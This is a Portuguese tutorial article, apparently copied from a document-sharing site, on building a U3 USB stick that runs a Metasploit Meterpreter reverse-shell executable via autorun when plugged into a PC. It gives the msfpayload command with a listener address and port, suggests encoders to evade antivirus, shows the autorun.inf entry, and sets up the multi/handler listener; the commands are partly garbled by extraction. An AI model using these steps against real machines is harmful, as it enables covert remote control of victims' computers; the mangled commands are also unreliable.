Escolar Documentos
Profissional Documentos
Cultura Documentos
Ataque USB U3 Com Metasploit (Artigo)
Enviado por
AliceTítulo original
Direitos autorais
Formatos disponíveis
Compartilhar este documento
Compartilhar ou incorporar documento
Você considera este documento útil?
Este conteúdo é inapropriado?
Denunciar este documentoDireitos autorais:
Formatos disponíveis
Ataque USB U3 Com Metasploit (Artigo)
Enviado por
AliceDireitos autorais:
Formatos disponíveis
28/01/13
Ataque USB U3 com Metasploit [Artigo]
Ataque USB U3 com Metasploit
Autor: Luiz Vieira
Data: 17/10/2010
O Ataque
1 - O Ataque
Em 4 passos simples iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize uma
conexo reversa com o Meterpreter.
A idia gerar, com o Metasploit, um arquivo executvel com um payload para gerar uma conexo reversa ao
conectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa Universal
Customizer.
1. Gerar o payload com o Metasploit
Neste caso vamos criar um executvel com uma conexo reversa do Meterpreter:
./m fpa load
indo
/me e p e e / e e
e_ cp LHOST=1.1.1.1 LPORT=443 X > mal a e.e e
Obviamente que podemos utilizar qualquer payload, como tambm utilizar encoders para tornar mais difcil sua
deteco por antivrus.
2. Criar nossa ISO
Uma
vez
que
tenhamos
baixado
e
descompactado
o
Universal
Customizer
(http://www.hak5.org/packages/files/Universal_Customizer.zip), copiamos o arquivo malware.exe para o diretrio
"U3CUSTOM" e criamos o arquivo "autorun.inf" com o seguinte conte do:
[AutoRun]
open=malware.exe
Aps isso, executamos o "ISOCreate.cmd" e dentro do diretrio "BIN" ser criada nossa ISO com o nome
"U3CUSTOM.ISO". Se no criarmos nossa ISO , o Universal Customizer utilizar a ISO "U3CUSTOM.ISO" que j
vem dentro do pacote, com uma verso feita por Hacksaw.
3. Gravar a ISO
Iniciamos o Universal Customizer e vamos seguindo os passo:
Ao finalizar, retiramos o pendrive, e quando voltarmos a conect-lo j teremos nosso payload sendo executado.
segurancalinu .com/artigos/impressora.php?codigo=10336
1/2
28/01/13
Ataque USB U3 com Metasploit [Artigo]
4. Aguardando a conex o reversa
Para finalizar, devemos deixar o meterpreter "escutando" espera da conexo reversa que ser feita pelo
payload gravado no pendrive:
./m fcon ole
e e ploi /m l i/handle
e PAYLAOD indo /me e p e e / e e
e LHOST 1.1.1.1
e LPORT 443
e E i OnSe ion fal e
e ploi -j
e_ cp
Isso tudo, que serve inclusive como uma prova de conceito para comprovar a segurana da mquina de um
usurio.
LINKS RELACIONADOS:
http://www.infoseczen.com/?p=127
http://www.slideshare.net/seguinfo/sallis-usb-hacks
http://www.hak5.org/packages/files/Universal_Customizer.zip
http://segurancalinux.com/artigo/Ataque-USB-U3-com-Metasploit
Voltar para o site
segurancalinu .com/artigos/impressora.php?codigo=10336
2/2
Você também pode gostar
- Por Uma Vida Mais Doce AdesivosDocumento3 páginasPor Uma Vida Mais Doce AdesivosAliceAinda não há avaliações
- Por Uma Vida Mais Doce 175 178 PDFDocumento2 páginasPor Uma Vida Mais Doce 175 178 PDFAliceAinda não há avaliações
- Google - Ferramenta de Ataque (E Defesa) A SistemasDocumento11 páginasGoogle - Ferramenta de Ataque (E Defesa) A SistemasAliceAinda não há avaliações
- Google - Ferramenta de Ataque (E Defesa) A SistemasDocumento11 páginasGoogle - Ferramenta de Ataque (E Defesa) A SistemasAliceAinda não há avaliações
- FirewallDocumento7 páginasFirewallslackmipsAinda não há avaliações
